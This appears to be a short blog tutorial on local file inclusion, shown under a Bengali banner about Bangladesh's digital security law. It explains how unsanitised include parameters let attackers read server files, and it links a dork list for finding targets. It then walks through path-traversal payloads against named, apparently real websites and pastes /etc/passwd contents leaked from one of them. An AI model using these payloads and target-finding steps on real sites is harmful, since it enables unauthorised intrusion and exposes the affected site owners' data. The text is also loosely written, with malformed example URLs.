⚠️ডিজিটাল নিরাপত্তা আইন, ২০১৮ রহিতক্রমে সাইবার নিরাপত্তা নিশ্চিতকরণ এবং ডিজিটাল বা ইলেকট্রনিক মাধ্যমে সংঘটিত অপরাধ শনাক্তকরণ, প্রতিরোধ, দমন ও উক্ত অপরাধের বিচার এবং আনুষঙ্গিক বিষয়ে নুতনভাবে বিধান প্রণয়নকল্পে প্রণীত আইন⚠️

Header Ads Widget

Responsive Advertisement

LFI

Local Local file inclusion  Vulnerability  {LFI}


Through This vuln.. .an attacker can Read any arbitrary file form the server.

For example :  reading backed source code , configuration file, log file ,etc.


This vuln.. Arise when user controllable input is begin used to include a file form the server without proper checks.

For example : http//:test.com/index.php?page= contact.php

                                                                    page=/etc/passwd


Most of the servers use linux servers .


There have etc/passwd confidential file 


Google Dork : https://github.com/Hood3dRob1n/BinGoo/blob/master/dorks/LFI-dork.lst 



  1. Get your target site using dork or anyway 

Example : https://www.ravagedband.com/index.php?page=biography.php 


  1. Go to LFI → lfi cheat sheet → load any payload 

Then press enter 

Got this :    root:x:0:0:root:/root:/bin/false ravagedband.com:x:53224:53224:ravagedband.com:/home/ravagedband.com:/bin/false  

Example site : 

→ Not worked in first attempt 

→  Not worked


→ https://confituredebali.com/index.php?page=../../../../../../../../../../../../etc/passwd



Post a Comment

0 Comments